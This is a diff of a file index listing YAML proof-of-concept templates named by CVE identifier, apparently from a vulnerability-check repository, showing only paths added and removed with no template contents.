./poc/cve/cve-2018-7700-3618.yaml ./poc/cve/cve-2018-7700-3619.yaml ./poc/cve/cve-2018-7700-3620.yaml @@ -38629,6 +38651,7 @@ ./poc/cve/cve-2018-8006-3628.yaml ./poc/cve/cve-2018-8006-3629.yaml ./poc/cve/cve-2018-8006-3631.yaml +./poc/cve/cve-2018-8033-3632.yaml ./poc/cve/cve-2018-8033-3633.yaml ./poc/cve/cve-2018-8033-3634.yaml ./poc/cve/cve-2018-8033-3635.yaml @@ -38654,18 +38677,17 @@ ./poc/cve/cve-2018-9126-3655.yaml ./poc/cve/cve-2018-9126-3656.yaml ./poc/cve/cve-2018-9126-3657.yaml -./poc/cve/cve-2018-9161-3658.yaml ./poc/cve/cve-2018-9161-3659.yaml ./poc/cve/cve-2018-9205-3660.yaml ./poc/cve/cve-2018-9205-3661.yaml ./poc/cve/cve-2018-9205-3662.yaml ./poc/cve/cve-2018-9205-3663.yaml -./poc/cve/cve-2018-9845-3664.yaml ./poc/cve/cve-2018-9845-3665.yaml ./poc/cve/cve-2018-9845-3666.yaml ./poc/cve/cve-2018-9995-3667.yaml ./poc/cve/cve-2018-9995-3668.yaml ./poc/cve/cve-2018-9995-3669.yaml +./poc/cve/cve-2018–14064.yaml ./poc/cve/cve-2019-0193-3670.yaml ./poc/cve/cve-2019-0193-3671.yaml ./poc/cve/cve-2019-0193-3672.yaml @@ -38697,9 +38719,9 @@ ./poc/cve/cve-2019-1010287-3697.yaml ./poc/cve/cve-2019-1010287-3698.yaml ./poc/cve/cve-2019-1010290-3699.yaml -./poc/cve/cve-2019-1010290-3700.yaml ./poc/cve/cve-2019-1010290-3701.yaml ./poc/cve/cve-2019-1010290-3702.yaml +./poc/cve/cve-2019-10232-3703.yaml ./poc/cve/cve-2019-10232-3704.yaml ./poc/cve/cve-2019-10232-3705.yaml ./poc/cve/cve-2019-10405-3706.yaml @@ -38728,6 +38750,7 @@ ./poc/cve/cve-2019-11248-3728.yaml ./poc/cve/cve-2019-11248-3729.yaml ./poc/cve/cve-2019-11248-3730.yaml +./poc/cve/cve-2019-11248-3731.yaml ./poc/cve/cve-2019-11248-3732.yaml ./poc/cve/cve-2019-11248-3733.yaml ./poc/cve/cve-2019-11248-3734.yaml @@ -38777,6 +38800,7 @@ ./poc/cve/cve-2019-12314-3775.yaml ./poc/cve/cve-2019-12314-3776.yaml ./poc/cve/cve-2019-12314-3777.yaml +./poc/cve/cve-2019-12314.yaml ./poc/cve/cve-2019-12461-3778.yaml ./poc/cve/cve-2019-12461-3779.yaml ./poc/cve/cve-2019-12461-3780.yaml @@ -38784,7 +38808,6 @@ ./poc/cve/cve-2019-12461-3782.yaml ./poc/cve/cve-2019-12461-3783.yaml ./poc/cve/cve-2019-12581(1).yaml -./poc/cve/cve-2019-12583(1).yaml ./poc/cve/cve-2019-12583-3784.yaml ./poc/cve/cve-2019-12593-1.yaml ./poc/cve/cve-2019-12593-2.yaml @@ -38805,6 +38828,7 @@ ./poc/cve/cve-2019-12725-3799.yaml ./poc/cve/cve-2019-12725-3800.yaml ./poc/cve/cve-2019-12725-3801.yaml +./poc/cve/cve-2019-12962(1).yaml ./poc/cve/cve-2019-13101-3802.yaml ./poc/cve/cve-2019-13101-3803.yaml ./poc/cve/cve-2019-13101-3804.yaml @@ -38815,6 +38839,7 @@ ./poc/cve/cve-2019-13392-3809.yaml ./poc/cve/cve-2019-13392-3810.yaml ./poc/cve/cve-2019-13396-3811.yaml +./poc/cve/cve-2019-13396-3812.yaml ./poc/cve/cve-2019-13396-3813.yaml ./poc/cve/cve-2019-13396-3814.yaml ./poc/cve/cve-2019-13396-3815.yaml @@ -38840,7 +38865,6 @@ ./poc/cve/cve-2019-14223-3835.yaml ./poc/cve/cve-2019-14223-3836.yaml ./poc/cve/cve-2019-14223.yaml -./poc/cve/cve-2019-14251(1).yaml ./poc/cve/cve-2019-14251-3837.yaml ./poc/cve/cve-2019-14251-3838.yaml ./poc/cve/cve-2019-14312-3839.yaml @@ -38864,7 +38888,6 @@ ./poc/cve/cve-2019-14470-3853.yaml ./poc/cve/cve-2019-14470-3854.yaml ./poc/cve/cve-2019-14470-3855.yaml -./poc/cve/cve-2019-14470.yaml ./poc/cve/cve-2019-14696-3856.yaml ./poc/cve/cve-2019-14696-3857.yaml ./poc/cve/cve-2019-14696-3858.yaml @@ -38883,7 +38906,6 @@ ./poc/cve/cve-2019-15043-3871.yaml ./poc/cve/cve-2019-15043-3872.yaml ./poc/cve/cve-2019-15043-3873.yaml -./poc/cve/cve-2019-15043.yaml ./poc/cve/cve-2019-15107-3874.yaml ./poc/cve/cve-2019-15107-3875.yaml ./poc/cve/cve-2019-15107-3876.yaml @@ -38897,6 +38919,7 @@ ./poc/cve/cve-2019-15713-3884.yaml ./poc/cve/cve-2019-15713-3885.yaml ./poc/cve/cve-2019-15713-3886.yaml +./poc/cve/cve-2019-15811(1).yaml ./poc/cve/cve-2019-15858-3888.yaml ./poc/cve/cve-2019-15858-3889.yaml ./poc/cve/cve-2019-15858-3890.yaml @@ -38915,7 +38938,6 @@ ./poc/cve/cve-2019-15889-3903.yaml ./poc/cve/cve-2019-15889-3904.yaml ./poc/cve/cve-2019-15889-3905.yaml -./poc/cve/cve-2019-15889.yaml ./poc/cve/cve-2019-16097-3906.yaml ./poc/cve/cve-2019-16097-3907.yaml ./poc/cve/cve-2019-16097-3908.yaml @@ -38928,7 +38950,6 @@ ./poc/cve/cve-2019-16123-3915.yaml ./poc/cve/cve-2019-16123-3916.yaml ./poc/cve/cve-2019-16123-3917.yaml -./poc/cve/cve-2019-16123-3918.yaml ./poc/cve/cve-2019-16278-3919.yaml ./poc/cve/cve-2019-16278-3920.yaml ./poc/cve/cve-2019-16278-3921.yaml @@ -38969,6 +38990,7 @@ ./poc/cve/cve-2019-16759-3955.yaml ./poc/cve/cve-2019-16759-3956.yaml ./poc/cve/cve-2019-16759-3957.yaml +./poc/cve/cve-2019-16759.yaml ./poc/cve/cve-2019-16920-1.yaml ./poc/cve/cve-2019-16920-2.yaml ./poc/cve/cve-2019-16920-3958.yaml @@ -38976,9 +38998,11 @@ ./poc/cve/cve-2019-16920-3960.yaml ./poc/cve/cve-2019-16920-3961.yaml ./poc/cve/cve-2019-16920-3962.yaml +./poc/cve/cve-2019-16931(1).yaml ./poc/cve/cve-2019-16931-3963.yaml ./poc/cve/cve-2019-16932-3964.yaml ./poc/cve/cve-2019-16996-3965.yaml +./poc/cve/cve-2019-16997-3966.yaml ./poc/cve/cve-2019-16997-3967.yaml ./poc/cve/cve-2019-16997-3968.yaml ./poc/cve/cve-2019-17270-3969.yaml @@ -39010,7 +39034,6 @@ ./poc/cve/cve-2019-17506-3991.yaml ./poc/cve/cve-2019-17538-3992.yaml ./poc/cve/cve-2019-17538-3993.yaml -./poc/cve/cve-2019-17538-3994.yaml ./poc/cve/cve-2019-17538-3995.yaml ./poc/cve/cve-2019-17538-3996.yaml ./poc/cve/cve-2019-17558-3997.yaml @@ -39018,8 +39041,10 @@ ./poc/cve/cve-2019-17558-4000.yaml ./poc/cve/cve-2019-17558-4001.yaml ./poc/cve/cve-2019-17558-4002.yaml +./poc/cve/cve-2019-17558.yaml ./poc/cve/cve-2019-1821-4003.yaml ./poc/cve/cve-2019-1821-4004.yaml +./poc/cve/cve-2019-18371(1).yaml ./poc/cve/cve-2019-18371-4005.yaml ./poc/cve/cve-2019-18393-4006.yaml ./poc/cve/cve-2019-18393-4007.yaml @@ -39034,6 +39059,7 @@ ./poc/cve/cve-2019-18394-4016.yaml ./poc/cve/cve-2019-18394-4017.yaml ./poc/cve/cve-2019-18394-4018.yaml +./poc/cve/cve-2019-18394.yaml ./poc/cve/cve-2019-18665(1).yaml ./poc/cve/cve-2019-18665-4019.yaml ./poc/cve/cve-2019-18665-4020.yaml @@ -39055,6 +39081,7 @@ ./poc/cve/cve-2019-19368-4036.yaml ./poc/cve/cve-2019-19368-4037.yaml ./poc/cve/cve-2019-19368-4038.yaml +./poc/cve/cve-2019-19368.yaml ./poc/cve/cve-2019-19719-4039.yaml ./poc/cve/cve-2019-19719-4040.yaml ./poc/cve/cve-2019-19719-4041.yaml @@ -39069,6 +39096,7 @@ ./poc/cve/cve-2019-19824-4050.yaml ./poc/cve/cve-2019-19824-4051.yaml ./poc/cve/cve-2019-19824-4052.yaml +./poc/cve/cve-2019-19824-4053.yaml ./poc/cve/cve-2019-19908-4054.yaml ./poc/cve/cve-2019-19908-4055.yaml ./poc/cve/cve-2019-19908-4056.yaml @@ -39107,6 +39135,7 @@ ./poc/cve/cve-2019-20183-4086.yaml ./poc/cve/cve-2019-20224(1).yaml ./poc/cve/cve-2019-20224-4087.yaml +./poc/cve/cve-2019-20354(1).yaml ./poc/cve/cve-2019-20933(1).yaml ./poc/cve/cve-2019-2578-1.yaml ./poc/cve/cve-2019-2578-2.yaml @@ -39136,7 +39165,6 @@ ./poc/cve/cve-2019-2725-4111.yaml ./poc/cve/cve-2019-2729-4112.yaml ./poc/cve/cve-2019-2729-4113.yaml -./poc/cve/cve-2019-2729-4114.yaml ./poc/cve/cve-2019-2729-4115.yaml ./poc/cve/cve-2019-2767-4116.yaml ./poc/cve/cve-2019-2767-4117.yaml @@ -39171,7 +39199,6 @@ ./poc/cve/cve-2019-3799-4147.yaml ./poc/cve/cve-2019-3799-4148.yaml ./poc/cve/cve-2019-3799-4149.yaml -./poc/cve/cve-2019-3799.yaml ./poc/cve/cve-2019-3911-4151.yaml ./poc/cve/cve-2019-3912-4152.yaml ./poc/cve/cve-2019-3912-4153.yaml @@ -39203,6 +39230,7 @@ ./poc/cve/cve-2019-6112-4175.yaml ./poc/cve/cve-2019-6112-4176.yaml ./poc/cve/cve-2019-6112-4177.yaml +./poc/cve/cve-2019-6112-4178.yaml ./poc/cve/cve-2019-6340-4179.yaml ./poc/cve/cve-2019-6340-4180.yaml ./poc/cve/cve-2019-6340-4181.yaml @@ -39249,6 +39277,7 @@ ./poc/cve/cve-2019-7275-4221.yaml ./poc/cve/cve-2019-7275-4222.yaml ./poc/cve/cve-2019-7275-4223.yaml +./poc/cve/cve-2019-7315(1).yaml ./poc/cve/cve-2019-7315-4224.yaml ./poc/cve/cve-2019-7315-4225.yaml ./poc/cve/cve-2019-7481-4226.yaml @@ -39257,7 +39286,9 @@ ./poc/cve/cve-2019-7481-4230.yaml ./poc/cve/cve-2019-7543-1.yaml ./poc/cve/cve-2019-7543-2.yaml +./poc/cve/cve-2019-7543-4231.yaml ./poc/cve/cve-2019-7543-4232.yaml +./poc/cve/cve-2019-7609-4233.yaml ./poc/cve/cve-2019-7609-4234.yaml ./poc/cve/cve-2019-7609-4235.yaml ./poc/cve/cve-2019-7609-4236.yaml @@ -39304,6 +39335,7 @@ ./poc/cve/cve-2019-8937-4275.yaml ./poc/cve/cve-2019-8937-4276.yaml ./poc/cve/cve-2019-8937-4277.yaml +./poc/cve/cve-2019-8937-4278.yaml ./poc/cve/cve-2019-8982-4279.yaml ./poc/cve/cve-2019-8982-4280.yaml ./poc/cve/cve-2019-8982-4281.yaml @@ -39317,7 +39349,6 @@ ./poc/cve/cve-2019-9041-4289.yaml ./poc/cve/cve-2019-9041-4290.yaml ./poc/cve/cve-2019-9041-4291.yaml -./poc/cve/cve-2019-9082-4292.yaml ./poc/cve/cve-2019-9082-4293.yaml ./poc/cve/cve-2019-9082-4294.yaml ./poc/cve/cve-2019-9618-4295.yaml @@ -39345,7 +39376,9 @@ ./poc/cve/cve-2019-9733-4315.yaml ./poc/cve/cve-2019-9733-4316.yaml ./poc/cve/cve-2019-9733.yaml +./poc/cve/cve-2019-9915(1).yaml ./poc/cve/cve-2019-9915-4317.yaml +./poc/cve/cve-2019-9922(1).yaml ./poc/cve/cve-2019-9922-4318.yaml ./poc/cve/cve-2019-9922-4319.yaml ./poc/cve/cve-2019-9955-4320.yaml @@ -39371,7 +39404,6 @@ ./poc/cve/cve-2020-0618-4338.yaml ./poc/cve/cve-2020-0618-4339.yaml ./poc/cve/cve-2020-0618.yaml -./poc/cve/cve-2020-10124(1).yaml ./poc/cve/cve-2020-10148-4340.yaml ./poc/cve/cve-2020-10148-4341.yaml ./poc/cve/cve-2020-10148-4342.yaml @@ -39389,7 +39421,6 @@ ./poc/cve/cve-2020-10220-4354.yaml ./poc/cve/cve-2020-10220-4355.yaml ./poc/cve/cve-2020-10220-4356.yaml -./poc/cve/cve-2020-10220.yaml ./poc/cve/cve-2020-10546-4357.yaml ./poc/cve/cve-2020-10546-4358.yaml ./poc/cve/cve-2020-10546-4359.yaml @@ -39412,6 +39443,7 @@ ./poc/cve/cve-2020-10549-4376.yaml ./poc/cve/cve-2020-10549-4377.yaml ./poc/cve/cve-2020-10549-4378.yaml +./poc/cve/cve-2020-10549-4379.yaml ./poc/cve/cve-2020-10770-4380.yaml ./poc/cve/cve-2020-10770-4381.yaml ./poc/cve/cve-2020-10770-4382.yaml @@ -39462,7 +39494,6 @@ ./poc/cve/cve-2020-11710-4422.yaml ./poc/cve/cve-2020-11710-4423.yaml ./poc/cve/cve-2020-11710-4424.yaml -./poc/cve/cve-2020-11738(1).yaml ./poc/cve/cve-2020-11738-1.yaml ./poc/cve/cve-2020-11738-2.yaml ./poc/cve/cve-2020-11738-4425.yaml @@ -39533,6 +39564,7 @@ ./poc/cve/cve-2020-13117-4489.yaml ./poc/cve/cve-2020-13117-4490.yaml ./poc/cve/cve-2020-13117-4491.yaml +./poc/cve/cve-2020-13158(1).yaml ./poc/cve/cve-2020-13158-4492.yaml ./poc/cve/cve-2020-13158-4493.yaml ./poc/cve/cve-2020-13158-4494.yaml @@ -39548,6 +39580,7 @@ ./poc/cve/cve-2020-13379-4502.yaml ./poc/cve/cve-2020-13379-4503.yaml ./poc/cve/cve-2020-13379.yaml +./poc/cve/cve-2020-13405(1).yaml ./poc/cve/cve-2020-13483-4504.yaml ./poc/cve/cve-2020-13483-4505.yaml ./poc/cve/cve-2020-13483-4506.yaml @@ -39570,20 +39603,18 @@ ./poc/cve/cve-2020-13937-4524.yaml ./poc/cve/cve-2020-13937-4525.yaml ./poc/cve/cve-2020-13937-4526.yaml -./poc/cve/cve-2020-13937.yaml ./poc/cve/cve-2020-13942-4527.yaml ./poc/cve/cve-2020-13942-4529.yaml ./poc/cve/cve-2020-13942-4530.yaml ./poc/cve/cve-2020-13942-4531.yaml ./poc/cve/cve-2020-13942-4532.yaml -./poc/cve/cve-2020-13942.yaml ./poc/cve/cve-2020-13945-4533.yaml ./poc/cve/cve-2020-13945-4534.yaml -./poc/cve/cve-2020-13945-4535.yaml ./poc/cve/cve-2020-14092-4536.yaml ./poc/cve/cve-2020-14092-4537.yaml ./poc/cve/cve-2020-14092-4538.yaml ./poc/cve/cve-2020-14092-4539.yaml +./poc/cve/cve-2020-14092-4540.yaml ./poc/cve/cve-2020-14179-4541.yaml ./poc/cve/cve-2020-14179-4542.yaml ./poc/cve/cve-2020-14179-4543.yaml @@ -39594,7 +39625,6 @@ ./poc/cve/cve-2020-14181-4549.yaml ./poc/cve/cve-2020-14181-4550.yaml ./poc/cve/cve-2020-14181-4551.yaml -./poc/cve/cve-2020-14408(1).yaml ./poc/cve/cve-2020-14413-4552.yaml ./poc/cve/cve-2020-14413-4553.yaml ./poc/cve/cve-2020-14413-4554.yaml @@ -39685,7 +39715,6 @@ ./poc/cve/cve-2020-16139-4634.yaml ./poc/cve/cve-2020-16139-4635.yaml ./poc/cve/cve-2020-16139-4636.yaml -./poc/cve/cve-2020-16139.yaml ./poc/cve/cve-2020-16270-4637.yaml ./poc/cve/cve-2020-16270-4638.yaml ./poc/cve/cve-2020-16270-4639.yaml @@ -39697,14 +39726,12 @@ ./poc/cve/cve-2020-16846-4646.yaml ./poc/cve/cve-2020-16920-4647.yaml ./poc/cve/cve-2020-16920-4648.yaml -./poc/cve/cve-2020-16920.yaml ./poc/cve/cve-2020-16952-4649.yaml ./poc/cve/cve-2020-16952-4650.yaml ./poc/cve/cve-2020-16952-4651.yaml ./poc/cve/cve-2020-16952-4652.yaml ./poc/cve/cve-2020-16952-4653.yaml ./poc/cve/cve-2020-16952-4654.yaml -./poc/cve/cve-2020-16952.yaml ./poc/cve/cve-2020-17362-4655.yaml ./poc/cve/cve-2020-17362-4656.yaml ./poc/cve/cve-2020-17362-4657.yaml @@ -39716,6 +39743,7 @@ ./poc/cve/cve-2020-17453-4663.yaml ./poc/cve/cve-2020-17453-4664.yaml ./poc/cve/cve-2020-17453-4665.yaml +./poc/cve/cve-2020-17456-4666.yaml ./poc/cve/cve-2020-17456-4667.yaml ./poc/cve/cve-2020-17496-4668.yaml ./poc/cve/cve-2020-17496-4669.yaml @@ -39741,11 +39769,9 @@ ./poc/cve/cve-2020-17519-4689.yaml ./poc/cve/cve-2020-17519-4690.yaml ./poc/cve/cve-2020-17519-4691.yaml -./poc/cve/cve-2020-17519-4692.yaml ./poc/cve/cve-2020-17519-4693.yaml ./poc/cve/cve-2020-17530-4694.yaml ./poc/cve/cve-2020-17530-4695.yaml -./poc/cve/cve-2020-17530-4696.yaml ./poc/cve/cve-2020-17530-4697.yaml ./poc/cve/cve-2020-17530-4698.yaml ./poc/cve/cve-2020-17530-4699.yaml @@ -39796,12 +39822,10 @@ ./poc/cve/cve-2020-20982-4741.yaml ./poc/cve/cve-2020-20982-4742.yaml ./poc/cve/cve-2020-20982-4743.yaml -./poc/cve/cve-2020-20988(1).yaml ./poc/cve/cve-2020-2103-4744.yaml ./poc/cve/cve-2020-2103-4745.yaml ./poc/cve/cve-2020-21224-4747.yaml ./poc/cve/cve-2020-21224-4748.yaml -./poc/cve/cve-2020-21224-4749.yaml ./poc/cve/cve-2020-21224-4750.yaml ./poc/cve/cve-2020-21224-4751.yaml ./poc/cve/cve-2020-21224-4752.yaml @@ -39814,7 +39838,8 @@ ./poc/cve/cve-2020-2199-4757.yaml ./poc/cve/cve-2020-2199-4758.yaml ./poc/cve/cve-2020-2199-4759.yaml -./poc/cve/cve-2020-22208(1).yaml +./poc/cve/cve-2020-22209(1).yaml +./poc/cve/cve-2020-22210(1).yaml ./poc/cve/cve-2020-22210-4760.yaml ./poc/cve/cve-2020-22210.yaml ./poc/cve/cve-2020-22840-4761.yaml @@ -39823,6 +39848,7 @@ ./poc/cve/cve-2020-22840-4765.yaml ./poc/cve/cve-2020-22840-4766.yaml ./poc/cve/cve-2020-22840-4767.yaml +./poc/cve/cve-2020-22840.yaml ./poc/cve/cve-2020-23015-4768.yaml ./poc/cve/cve-2020-23015-4769.yaml ./poc/cve/cve-2020-23015-4770.yaml @@ -39834,6 +39860,7 @@ ./poc/cve/cve-2020-23517-4776.yaml ./poc/cve/cve-2020-23517-4777.yaml ./poc/cve/cve-2020-23517-4778.yaml +./poc/cve/cve-2020-23517.yaml ./poc/cve/cve-2020-23575-4779.yaml ./poc/cve/cve-2020-23575-4780.yaml ./poc/cve/cve-2020-23575-4781.yaml @@ -39888,6 +39915,7 @@ ./poc/cve/cve-2020-24579-4830.yaml ./poc/cve/cve-2020-24579-4831.yaml ./poc/cve/cve-2020-24579-4832.yaml +./poc/cve/cve-2020-24579-4833.yaml ./poc/cve/cve-2020-24589-4834.yaml ./poc/cve/cve-2020-24589-4835.yaml ./poc/cve/cve-2020-24589-4836.yaml @@ -39948,9 +39976,11 @@ ./poc/cve/cve-2020-25540-4890.yaml ./poc/cve/cve-2020-25540-4891.yaml ./poc/cve/cve-2020-25540-4892.yaml +./poc/cve/cve-2020-25540.yaml ./poc/cve/cve-2020-2555.yaml ./poc/cve/cve-2020-25780-4893.yaml ./poc/cve/cve-2020-25780-4894.yaml +./poc/cve/cve-2020-25780-4895.yaml ./poc/cve/cve-2020-25864-4897.yaml ./poc/cve/cve-2020-25864-4898.yaml ./poc/cve/cve-2020-26067-4899.yaml @@ -39977,12 +40007,14 @@ ./poc/cve/cve-2020-26413-4925.yaml ./poc/cve/cve-2020-26876-4926.yaml ./poc/cve/cve-2020-26919-4927.yaml +./poc/cve/cve-2020-26919-4928.yaml ./poc/cve/cve-2020-26919-4929.yaml ./poc/cve/cve-2020-26919-4930.yaml ./poc/cve/cve-2020-26919-4931.yaml ./poc/cve/cve-2020-26919-4932.yaml ./poc/cve/cve-2020-26948-4933.yaml ./poc/cve/cve-2020-26948-4934.yaml +./poc/cve/cve-2020-26948-4935.yaml ./poc/cve/cve-2020-26948-4936.yaml ./poc/cve/cve-2020-26948-4937.yaml ./poc/cve/cve-2020-26948-4938.yaml @@ -40034,7 +40066,6 @@ ./poc/cve/cve-2020-28871-4986.yaml ./poc/cve/cve-2020-28871-4987.yaml ./poc/cve/cve-2020-28871-4988.yaml -./poc/cve/cve-2020-28976-4989.yaml ./poc/cve/cve-2020-28976-4990.yaml ./poc/cve/cve-2020-28976-4991.yaml ./poc/cve/cve-2020-29164-4992.yaml @@ -40052,7 +40083,6 @@ ./poc/cve/cve-2020-29395-5004.yaml ./poc/cve/cve-2020-29395-5005.yaml ./poc/cve/cve-2020-29395-5006.yaml -./poc/cve/cve-2020-29395.yaml ./poc/cve/cve-2020-29453-1.yaml ./poc/cve/cve-2020-29453-5007.yaml ./poc/cve/cve-2020-29453-5008.yaml @@ -40065,7 +40095,6 @@ ./poc/cve/cve-2020-3187-5015.yaml ./poc/cve/cve-2020-3187-5016.yaml ./poc/cve/cve-2020-3187-5017.yaml -./poc/cve/cve-2020-3452(1).yaml ./poc/cve/cve-2020-3452-1.yaml ./poc/cve/cve-2020-3452-2.yaml ./poc/cve/cve-2020-3452-5018.yaml @@ -40099,7 +40128,6 @@ ./poc/cve/cve-2020-35580-5046.yaml ./poc/cve/cve-2020-35580-5047.yaml ./poc/cve/cve-2020-35580-5048.yaml -./poc/cve/cve-2020-35580-5049.yaml ./poc/cve/cve-2020-35580-5050.yaml ./poc/cve/cve-2020-35580-5051.yaml ./poc/cve/cve-2020-35598-5052.yaml @@ -40115,8 +40143,10 @@ ./poc/cve/cve-2020-35729-5062.yaml ./poc/cve/cve-2020-35729-5063.yaml ./poc/cve/cve-2020-35729-5064.yaml +./poc/cve/cve-2020-35729-5065.yaml ./poc/cve/cve-2020-35736-5066.yaml ./poc/cve/cve-2020-35736-5067.yaml +./poc/cve/cve-2020-35736-5068.yaml ./poc/cve/cve-2020-35736-5069.yaml ./poc/cve/cve-2020-35736-5070.yaml ./poc/cve/cve-2020-35736-5071.yaml @@ -40131,7 +40161,6 @@ ./poc/cve/cve-2020-35774-5082.yaml ./poc/cve/cve-2020-3580-5083.yaml ./poc/cve/cve-2020-3580-5084.yaml -./poc/cve/cve-2020-3580-5085.yaml ./poc/cve/cve-2020-3580-5086.yaml ./poc/cve/cve-2020-3580-5087.yaml ./poc/cve/cve-2020-35846-5088.yaml @@ -40139,6 +40168,7 @@ ./poc/cve/cve-2020-35846-5091.yaml ./poc/cve/cve-2020-35846-5092.yaml ./poc/cve/cve-2020-35846-5093.yaml +./poc/cve/cve-2020-35847-5094.yaml ./poc/cve/cve-2020-35847-5095.yaml ./poc/cve/cve-2020-35847-5096.yaml ./poc/cve/cve-2020-35847-5097.yaml @@ -40196,6 +40226,7 @@ ./poc/cve/cve-2020-5284-5143.yaml ./poc/cve/cve-2020-5284-5144.yaml ./poc/cve/cve-2020-5284-5145.yaml +./poc/cve/cve-2020-5284.yaml ./poc/cve/cve-2020-5307-5146.yaml ./poc/cve/cve-2020-5307-5147.yaml ./poc/cve/cve-2020-5307-5148.yaml @@ -40212,7 +40243,6 @@ ./poc/cve/cve-2020-5405-5160.yaml ./poc/cve/cve-2020-5405-5161.yaml ./poc/cve/cve-2020-5405-5162.yaml -./poc/cve/cve-2020-5405.yaml ./poc/cve/cve-2020-5410-5163.yaml ./poc/cve/cve-2020-5410-5164.yaml ./poc/cve/cve-2020-5410-5165.yaml @@ -40316,7 +40346,6 @@ ./poc/cve/cve-2020-7796-5256.yaml ./poc/cve/cve-2020-7796-5257.yaml ./poc/cve/cve-2020-7943-5258.yaml -./poc/cve/cve-2020-7943-5259.yaml ./poc/cve/cve-2020-7943-5260.yaml ./poc/cve/cve-2020-7943-5261.yaml ./poc/cve/cve-2020-7961-1.yaml @@ -40341,6 +40370,7 @@ ./poc/cve/cve-2020-8115-5278.yaml ./poc/cve/cve-2020-8115-5279.yaml ./poc/cve/cve-2020-8115-5280.yaml +./poc/cve/cve-2020-8115.yaml ./poc/cve/cve-2020-8163-5281.yaml ./poc/cve/cve-2020-8163-5282.yaml ./poc/cve/cve-2020-8163-5283.yaml @@ -40349,6 +40379,7 @@ ./poc/cve/cve-2020-8163-5286.yaml ./poc/cve/cve-2020-8163-5287.yaml ./poc/cve/cve-2020-8163-5288.yaml +./poc/cve/cve-2020-8163.yaml ./poc/cve/cve-2020-8191-5289.yaml ./poc/cve/cve-2020-8191-5290.yaml ./poc/cve/cve-2020-8191-5291.yaml @@ -40393,11 +40424,13 @@ ./poc/cve/cve-2020-8515-5327.yaml ./poc/cve/cve-2020-8515-5328.yaml ./poc/cve/cve-2020-8515-5329.yaml +./poc/cve/cve-2020-8641-5330.yaml ./poc/cve/cve-2020-8641-5331.yaml ./poc/cve/cve-2020-8641-5332.yaml ./poc/cve/cve-2020-8641-5333.yaml ./poc/cve/cve-2020-8641-5334.yaml ./poc/cve/cve-2020-8644-5335.yaml +./poc/cve/cve-2020-8654(1).yaml ./poc/cve/cve-2020-8771-5336.yaml ./poc/cve/cve-2020-8771-5337.yaml ./poc/cve/cve-2020-8771-5338.yaml @@ -40495,6 +40528,7 @@ ./poc/cve/cve-2020-9757-5424.yaml ./poc/cve/cve-2020-9757-5425.yaml ./poc/cve/cve-2020-9757-5426.yaml +./poc/cve/cve-20200924a.yaml ./poc/cve/cve-2020–26073-4901.yaml ./poc/cve/cve-2020–26073-4903.yaml ./poc/cve/cve-2020–26073-4905.yaml @@ -40534,8 +40568,6 @@ ./poc/cve/cve-2021-20114-5459.yaml ./poc/cve/cve-2021-20114-5460.yaml ./poc/cve/cve-2021-20114-5461.yaml -./poc/cve/cve-2021-20114-5462.yaml -./poc/cve/cve-2021-20123-5463.yaml ./poc/cve/cve-2021-20123-5464.yaml ./poc/cve/cve-2021-20123-5465.yaml ./poc/cve/cve-2021-20124-5466.yaml @@ -40585,7 +40617,6 @@ ./poc/cve/cve-2021-21389-5510.yaml ./poc/cve/cve-2021-21389-5511.yaml ./poc/cve/cve-2021-21389-5512.yaml -./poc/cve/cve-2021-21389-5513.yaml ./poc/cve/cve-2021-21389-5514.yaml ./poc/cve/cve-2021-21402-1.yaml ./poc/cve/cve-2021-21402-2.yaml @@ -40596,17 +40627,16 @@ ./poc/cve/cve-2021-21402-5519.yaml ./poc/cve/cve-2021-21402-5520.yaml ./poc/cve/cve-2021-21402-5521.yaml -./poc/cve/cve-2021-21402.yaml ./poc/cve/cve-2021-21479-5522.yaml ./poc/cve/cve-2021-21479-5523.yaml -./poc/cve/cve-2021-21479-5524.yaml ./poc/cve/cve-2021-21479-5525.yaml ./poc/cve/cve-2021-21479-5526.yaml +./poc/cve/cve-2021-21745(1).yaml ./poc/cve/cve-2021-21745-5527.yaml +./poc/cve/cve-2021-21799(1).yaml ./poc/cve/cve-2021-21801-5528.yaml ./poc/cve/cve-2021-21801-5529.yaml ./poc/cve/cve-2021-21801-5530.yaml -./poc/cve/cve-2021-21801-5531.yaml ./poc/cve/cve-2021-21802-5532.yaml ./poc/cve/cve-2021-21802-5533.yaml ./poc/cve/cve-2021-21802-5534.yaml @@ -40620,6 +40650,7 @@ ./poc/cve/cve-2021-21816-5541.yaml ./poc/cve/cve-2021-21816-5542.yaml ./poc/cve/cve-2021-21881-5543.yaml +./poc/cve/cve-2021-21881-5544.yaml ./poc/cve/cve-2021-21972-5545.yaml ./poc/cve/cve-2021-21972-5547.yaml ./poc/cve/cve-2021-21972-5548.yaml @@ -40656,6 +40687,7 @@ ./poc/cve/cve-2021-22053-5579.yaml ./poc/cve/cve-2021-22053-5580.yaml ./poc/cve/cve-2021-22053-5581.yaml +./poc/cve/cve-2021-22054(1).yaml ./poc/cve/cve-2021-22054-5582.yaml ./poc/cve/cve-2021-22122-1.yaml ./poc/cve/cve-2021-22122-2.yaml @@ -40676,10 +40708,8 @@ ./poc/cve/cve-2021-22214-5598.yaml ./poc/cve/cve-2021-22214-5599.yaml ./poc/cve/cve-2021-22214-5600.yaml -./poc/cve/cve-2021-22214-5601.yaml ./poc/cve/cve-2021-22214-5602.yaml ./poc/cve/cve-2021-22214-5603.yaml -./poc/cve/cve-2021-22502(1).yaml ./poc/cve/cve-2021-22873-1.yaml ./poc/cve/cve-2021-22873-2.yaml ./poc/cve/cve-2021-22873-3.yaml @@ -40734,10 +40764,12 @@ ./poc/cve/cve-2021-24235-5651.yaml ./poc/cve/cve-2021-24235-5652.yaml ./poc/cve/cve-2021-24235-5653.yaml +./poc/cve/cve-2021-24236(1).yaml ./poc/cve/cve-2021-24237-5654.yaml ./poc/cve/cve-2021-24237-5655.yaml ./poc/cve/cve-2021-24237-5656.yaml ./poc/cve/cve-2021-24237-5657.yaml +./poc/cve/cve-2021-24245(1).yaml ./poc/cve/cve-2021-24274-5658.yaml ./poc/cve/cve-2021-24274-5659.yaml ./poc/cve/cve-2021-24274-5660.yaml @@ -40755,6 +40787,7 @@ ./poc/cve/cve-2021-24285-5672.yaml ./poc/cve/cve-2021-24285-5673.yaml ./poc/cve/cve-2021-24285-5674.yaml +./poc/cve/cve-2021-24286(1).yaml ./poc/cve/cve-2021-24288-5675.yaml ./poc/cve/cve-2021-24288-5676.yaml ./poc/cve/cve-2021-24288-5677.yaml @@ -40769,7 +40802,6 @@ ./poc/cve/cve-2021-24298-5686.yaml ./poc/cve/cve-2021-24298-5687.yaml ./poc/cve/cve-2021-24298-5688.yaml 